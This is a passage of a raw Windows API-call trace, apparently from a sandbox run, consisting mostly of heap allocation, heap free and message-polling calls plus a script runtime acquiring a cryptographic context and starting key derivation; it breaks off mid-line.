[0265.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.731] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.731] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0265.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.732] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0265.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.732] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0265.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0265.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.736] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.737] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.737] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0265.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0265.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0265.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.739] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0265.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 